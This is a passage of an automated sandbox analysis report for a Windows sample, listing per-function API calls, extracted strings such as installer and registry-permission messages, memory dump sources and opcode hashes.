                                                          • Instruction Fuzzy Hash: FC513975A002089FDB11DFA9C881AAEBBF9FF49700F114466F904EB750D738AD40CBA8
                                                          APIs
                                                          • GetFocus.USER32 ref: 0041B576
                                                          • 73A1A570.USER32(?,00000000,0041B650,?,?,?,?), ref: 0041B582
                                                          • 73A24620.GDI32(?,00000068,00000000,0041B624,?,?,00000000,0041B650,?,?,?,?), ref: 0041B59E
                                                          • 73A4E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B624,?,?,00000000,0041B650,?,?,?,?), ref: 0041B5BB
                                                          • 73A4E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B624,?,?,00000000,0041B650), ref: 0041B5D2
                                                          • 73A1A480.USER32(?,?,0041B62B,?,?), ref: 0041B61E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: E680$A24620A480A570Focus
                                                          • String ID:
                                                          • API String ID: 3709697839-0
                                                          • Opcode ID: b97e33ea795034c912b2e17a9f5d54d6d1d1af920c0d7a51194e8edd97010b3d
                                                          • Instruction ID: df8759ecd31a85a201270414174f0a8fa00d18147156f7fa6755a0b35bba35d1
                                                          • Opcode Fuzzy Hash: b97e33ea795034c912b2e17a9f5d54d6d1d1af920c0d7a51194e8edd97010b3d
                                                          • Instruction Fuzzy Hash: E9410831A00258AFCB10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D50CBA5
                                                          APIs
                                                          • SetLastError.KERNEL32(00000057,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CED7
                                                          • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045CFA4,?,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CF16
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                          • API String ID: 1452528299-1580325520
                                                          • Opcode ID: 76cc67341227ff3c05617fb08029e3d04d7592c217e5ac47b77cb7a8c66e2160
                                                          • Instruction ID: 04ddcdc8736abbc18e914b4e1455ed0448250d7d0c77fa2ba5441d80ccfd4ce1
                                                          • Opcode Fuzzy Hash: 76cc67341227ff3c05617fb08029e3d04d7592c217e5ac47b77cb7a8c66e2160
                                                          • Instruction Fuzzy Hash: C7118736204304FFDB11DA91C9C2AAEB69EDB44746F6040776D00967C3D67C9F0AE56D
                                                          APIs
                                                          • GetSystemMetrics.USER32(0000000B), ref: 0041BDCD
                                                          • GetSystemMetrics.USER32(0000000C), ref: 0041BDD7
                                                          • 73A1A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDE1
                                                          • 73A24620.GDI32(00000000,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE08
                                                          • 73A24620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE15
                                                          • 73A1A480.USER32(00000000,00000000,0041BE5B,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE4E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: A24620MetricsSystem$A480A570
                                                          • String ID:
                                                          • API String ID: 4042297458-0
                                                          • Opcode ID: b7d5d08e3e19f48413646ae1536af481ff140cf83ce15b3b4f218d501696187d
                                                          • Instruction ID: 747e2eb1a3f7a7c841cace1b59abe43854f3131f67fff351bf4eed9cd228abed
                                                          • Opcode Fuzzy Hash: b7d5d08e3e19f48413646ae1536af481ff140cf83ce15b3b4f218d501696187d
                                                          • Instruction Fuzzy Hash: 98215974E00748AFEB10EFA9C942BEEBBB4EB48714F10842AF514B7280D7785D40CB69
                                                          APIs
                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0047DDAE
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CB69), ref: 0047DDD4
                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0047DDE4
                                                          • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047DE05
                                                          • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047DE19
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047DE35
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$Show
                                                          • String ID:
                                                          • API String ID: 3609083571-0
                                                          • Opcode ID: 69fb56ec72bb48bf799d73a9f514c3e84a97c3b26dbd79650f0c817e19817d20
                                                          • Instruction ID: 8d1f2698ea79badf96abf755c5a3f857121e06e6ffc739f26560ae4cefe558a1
                                                          • Opcode Fuzzy Hash: 69fb56ec72bb48bf799d73a9f514c3e84a97c3b26dbd79650f0c817e19817d20
                                                          • Instruction Fuzzy Hash: CA0112B5651610ABE700D768DE45F7637E8AF1C324F094266B659DF3E3C738E8408B49
                                                          APIs
                                                            • Part of subcall function 0041A6D8: CreateBrushIndirect.GDI32 ref: 0041A743
                                                          • UnrealizeObject.GDI32(00000000), ref: 0041B274
                                                          • SelectObject.GDI32(?,00000000), ref: 0041B286
                                                          • SetBkColor.GDI32(?,00000000), ref: 0041B2A9
                                                          • SetBkMode.GDI32(?,00000002), ref: 0041B2B4
                                                          • SetBkColor.GDI32(?,00000000), ref: 0041B2CF
                                                          • SetBkMode.GDI32(?,00000001), ref: 0041B2DA
                                                            • Part of subcall function 0041A050: GetSysColor.USER32(?), ref: 0041A05A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                          • String ID:
                                                          • API String ID: 3527656728-0
                                                          • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                          • Instruction ID: 416fc8ddf3b290ca22d08e3f0d0fa9d59de125dbf6d826fc2ec32e7be4b681d8
                                                          • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                          • Instruction Fuzzy Hash: 15F072B56015009FDF00FFAAD9C6E5F67989F043197048456B948DF197C93DD8505B3A
                                                          APIs
                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045397F
                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045398F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateFileHandle
                                                          • String ID: -cI$.tmp$_iu
                                                          • API String ID: 3498533004-3964432171
                                                          • Opcode ID: 02fc6949860a742288c4963694ea4c9fb07eaa5c322dedd883b179278d380901
                                                          • Instruction ID: 987f34639f2954820d3a171204f3ba7a53f2c28fb23a6faa943e541cb6d42ed5
                                                          • Opcode Fuzzy Hash: 02fc6949860a742288c4963694ea4c9fb07eaa5c322dedd883b179278d380901
                                                          • Instruction Fuzzy Hash: 293195B0A00249ABCB11EFA5C942BAEBBB4AF44309F60456AF800B73C2D6785F059758
                                                          APIs
                                                            • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                          • ShowWindow.USER32(?,00000005,00000000,004974CD,?,?,00000000), ref: 0049729E
                                                            • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                            • Part of subcall function 00407298: SetCurrentDirectoryA.KERNEL32(00000000,?,004972C6,00000000,00497499,?,?,00000005,00000000,004974CD,?,?,00000000), ref: 004072A3
                                                            • Part of subcall function 0042D444: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4D2,?,?,?,00000001,?,00456052,00000000,004560BA), ref: 0042D479
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                          • String ID: .dat$.msg$IMsg$Uninstall
                                                          • API String ID: 3312786188-1660910688
                                                          • Opcode ID: fee9eccc106b75620d129768861d1a7621c8bfd9450b5e9a776089888b3099eb
                                                          • Instruction ID: 502499af6c4fed57a8803849289841afdffa1b87ef326e8d9c35a034d288349d
                                                          • Opcode Fuzzy Hash: fee9eccc106b75620d129768861d1a7621c8bfd9450b5e9a776089888b3099eb
                                                          • Instruction Fuzzy Hash: 20317574A10214AFCB01EF65DC92D5E7BB5FB88318B51847AF800AB792D739BD05CB58
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EAD2
                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAD8
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB01
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressByteCharHandleModuleMultiProcWide
                                                          • String ID: ShutdownBlockReasonCreate$user32.dll
                                                          • API String ID: 828529508-2866557904
                                                          • Opcode ID: f0f9c1c29cdcfbee2e7a8f4e336c776c41a61f3b4eee9e965eb88e8c498f29e0
                                                          • Instruction ID: 08d6e73c43f4c72d4bf81f88f5f107f4332e42bd1359b104b354d246f0006fb7
                                                          • Opcode Fuzzy Hash: f0f9c1c29cdcfbee2e7a8f4e336c776c41a61f3b4eee9e965eb88e8c498f29e0
                                                          • Instruction Fuzzy Hash: 14F0F6D034062237E620B6BFAC82F7B59CC8F9472AF140036F109EB2C2E96C9905427F
                                                          APIs
                                                          • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                          • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                          • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                          • String ID: $O
                                                          • API String ID: 730355536-4089063739
                                                          • Opcode ID: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                          • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                          • Opcode Fuzzy Hash: 0971dfa849a4ffc4cae04a3e1ff9e59bd0eaa306d87ad714f1f0155365df5b79
                                                          • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                          APIs
                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00457E48
                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00457E69
                                                          • CloseHandle.KERNEL32(?,00457E9C), ref: 00457E8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                          • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                          • API String ID: 2573145106-3235461205
                                                          • Opcode ID: fd83349507a0981e80b71893faadad776893e27a60c3cb1bdbbb378314d18f26
                                                          • Instruction ID: 364c7453444e38e17299d149b0285d9f966ded63b706bec2a35302b816cfa9f1
                                                          • Opcode Fuzzy Hash: fd83349507a0981e80b71893faadad776893e27a60c3cb1bdbbb378314d18f26
                                                          • Instruction Fuzzy Hash: 88018F71608304AFD711EBA99D03A2E73A9EB49715F6040B6FC10E72D3DA389D048619
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA68,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9BA
                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C0
                                                          • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressExchangeHandleInterlockedModuleProc
                                                          • String ID: ChangeWindowMessageFilter$user32.dll
                                                          • API String ID: 3478007392-2498399450
                                                          • Opcode ID: e1b8650f68b4f5373240c16350828cc36d4525f286b48015e4a1be8ef0f4b549
                                                          • Instruction ID: 012688e8468ec3177747178b84a01981fc81215c8fc8f9e453d059575ed0bd59
                                                          • Opcode Fuzzy Hash: e1b8650f68b4f5373240c16350828cc36d4525f286b48015e4a1be8ef0f4b549
                                                          • Instruction Fuzzy Hash: B5E0ECA1740314EAEA203B66BE8AF573558E724B19F54003BF100A51F2C7BC1C80CA9E
                                                          APIs
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00477630
                                                          • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477727,0049C0A4,00000000), ref: 00477643
                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477649
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProcProcessThreadWindow
                                                          • String ID: AllowSetForegroundWindow$user32.dll
                                                          • API String ID: 1782028327-3855017861
                                                          • Opcode ID: f9c0aa6575de5325031961dc8c28253599d1abb86677e5186b48b355b3ec359b
                                                          • Instruction ID: 000833d094a070652a329d30f0dc0cedfc4963abb7563544beb27e38e0473342
                                                          • Opcode Fuzzy Hash: f9c0aa6575de5325031961dc8c28253599d1abb86677e5186b48b355b3ec359b
                                                          • Instruction Fuzzy Hash: 8DD05E90249B02A9D90073B94C46F6F224C8A90B68790843B7408F218ECA3CDC00AA3C
                                                          APIs
                                                          • BeginPaint.USER32(00000000,?), ref: 00416C4A
                                                          • SaveDC.GDI32(?), ref: 00416C7B
                                                          • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D3D), ref: 00416CDC
                                                          • RestoreDC.GDI32(?,?), ref: 00416D03
                                                          • EndPaint.USER32(00000000,?,00416D44,00000000,00416D3D), ref: 00416D37
                                                          Similarity
                                                          • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                          • String ID:
                                                          • API String ID: 3808407030-0
                                                          • Opcode ID: b6c8991bbe38a25b063fe02cbbd384aaa1ab048ef0fa4b5957116aa5db27c33c
                                                          • Instruction ID: a024d51d8e1917fcb77b8775c892227abb36bb6ea51d3f2ecd71d44c14df9e09
                                                          • Opcode Fuzzy Hash: b6c8991bbe38a25b063fe02cbbd384aaa1ab048ef0fa4b5957116aa5db27c33c
                                                          • Instruction Fuzzy Hash: 90414170A04244AFCB04DBA9C595FAA77F5FF48304F1640AAE8459B362D778DD81CF54
                                                          APIs
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 76268f3067fd7e5b2c462dbffcea77bb187ec6f22ea95bd0c2474c45d8462d54
                                                          • Instruction ID: 35d93ad14ebc553eed2a21e9b47c67a907fa477780373b58b871235641bd8dc8
                                                          • Opcode Fuzzy Hash: 76268f3067fd7e5b2c462dbffcea77bb187ec6f22ea95bd0c2474c45d8462d54
                                                          • Instruction Fuzzy Hash: B23132746057409FC320EB69C584BABB7E8AF89714F04891EF9D9C7751C638EC818B19
                                                          APIs
                                                          • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429800
                                                          • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 0042982F
                                                          • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 0042984B
                                                          • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 00429876
                                                          • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 00429894
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 9f4218a80dfb6ea41a935cea72b52cc504d621f6de5a3555e5000c6e6653befd
                                                          • Instruction ID: c6a16a7b88e0b18788f8573a4e1e1ff521d0234e697c82a38616540cbd285451
                                                          • Opcode Fuzzy Hash: 9f4218a80dfb6ea41a935cea72b52cc504d621f6de5a3555e5000c6e6653befd
                                                          • Instruction Fuzzy Hash: 0621AF707507057AE710FB67DC82F8B7AECDB41708F54483EB905AB6D2DBB8AD418618
                                                          APIs
                                                          • GetSystemMetrics.USER32(0000000B), ref: 0041BBC2
                                                          • GetSystemMetrics.USER32(0000000C), ref: 0041BBCC
                                                          • 73A1A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC0A
                                                          • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD75,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC51
                                                          • DeleteObject.GDI32(00000000), ref: 0041BC92
                                                          Similarity
                                                          • API ID: MetricsSystem$A26310A570DeleteObject
                                                          • String ID:
                                                          • API String ID: 4277397052-0
                                                          • Opcode ID: e18963905fbda8c1d4957780915d0687961bfe8337bc9852c69d647676f2e28b
                                                          • Instruction ID: 58bffdd5ee351b83518612b46dbf543796c6efca4902a0296a584a1adfede215
                                                          • Opcode Fuzzy Hash: e18963905fbda8c1d4957780915d0687961bfe8337bc9852c69d647676f2e28b
                                                          • Instruction Fuzzy Hash: E2317F70E00208EFDB04DFA5C942AAEB7F5EB48704F21856AF514EB381D7789E80DB95
                                                          APIs
                                                            • Part of subcall function 0045CE6C: SetLastError.KERNEL32(00000057,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CED7
                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00473494,?,?,0049C1D0,00000000), ref: 0047344D
                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00473494,?,?,0049C1D0,00000000), ref: 00473463
                                                          Strings
                                                          • Could not set permissions on the registry key because it currently does not exist., xrefs: 00473457
                                                          • Failed to set permissions on registry key (%d)., xrefs: 00473474
                                                          • Setting permissions on registry key: %s\%s, xrefs: 00473412
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                          • API String ID: 1452528299-4018462623
                                                          • Opcode ID: c2b4e85895e31eb7a4579faef75fdd198930d34150e3eae1e6804dec0b8ec56e
                                                          • Instruction ID: 1dcd38469e34a8f7cdaf58011d69bd772563d378ec45d4c1a9cd481a7780d06e
                                                          • Opcode Fuzzy Hash: c2b4e85895e31eb7a4579faef75fdd198930d34150e3eae1e6804dec0b8ec56e
                                                          • Instruction Fuzzy Hash: 9221B370A042445FCB05DFAAC8816EEBBE8DF49319F50817AE448E7392D77C5E058BAD
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                          • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$AllocString
                                                          • String ID:
                                                          • API String ID: 262959230-0
                                                          • Opcode ID: fdbd74c082f9815823b504bab77549cef434610d295dd08879ffad668e8b5e0c
                                                          • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                          • Opcode Fuzzy Hash: fdbd74c082f9815823b504bab77549cef434610d295dd08879ffad668e8b5e0c
                                                          • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                          APIs
                                                          • 73A18830.GDI32(00000000,00000000,00000000), ref: 00414411
                                                          • 73A122A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414419
                                                          • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041442D
                                                          • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414433
